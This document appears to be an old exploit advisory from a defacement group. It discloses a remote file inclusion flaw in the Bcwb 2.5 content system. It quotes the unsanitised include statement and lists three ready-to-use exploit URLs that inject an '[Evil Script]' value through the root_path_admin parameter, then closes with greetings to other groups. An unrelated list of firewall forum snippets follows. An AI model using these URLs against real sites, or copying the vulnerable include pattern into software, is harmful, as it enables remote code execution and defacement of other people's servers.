Multiple Remote File Include



####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall

# Application Affect:
Bcwb 2.5

# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download

# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');

# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]

# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.

####################### Firewall #########################



Relevant Pages

  • Re: RFC: my firewall ruleset(s)
    ... IPFW numbers rules that increment by 1. ... > The reasoning behind this is so I have a single firewall script for all ... Depending on the rc.conf entries on that server, the firewall ...
    (freebsd-questions)
  • Re: Turing of SP2 Firewall via registry entry?
    ... Group Policy that disables the firewall (see WF_XPSP2.doc ... Disabling the Use of Windows Firewall Across Your Network ... you create a script file that is read by ...
    (microsoft.public.windowsxp.security_admin)
  • Re: MS Security CD, wsh topic buried, non automated post (promise)
    ... Their stuff is for server is seems. ... you most likely want to script your 'access'. ... the firewall still inserted stuff in about every ... > Saying that you network drives may cease working. ...
    (microsoft.public.scripting.wsh)
  • Re: File and Printer Sharing bug with Norton Personal Firewall 2004
    ... > There is definitely 100% a File and Printer Sharing bug with Norton ... > I have File and Printer Sharing Configured with maximum permissiveness. ... > firewall off and on again, on both computers, it works. ... > ANY SETTINGS OR DO ANYTHING JUST SHUT ALL WINDOWS. ...
    (comp.security.firewalls)
  • XP/W2K/NT BUG
    ... Delusion had found a humdinger of a bug. ... Your firewall protects you from an MS03-026 exploit so long as the hostile ... Server 2003 at ... 135 sitting open and exposed to the Internet. ...
    (microsoft.public.windowsxp.security_admin)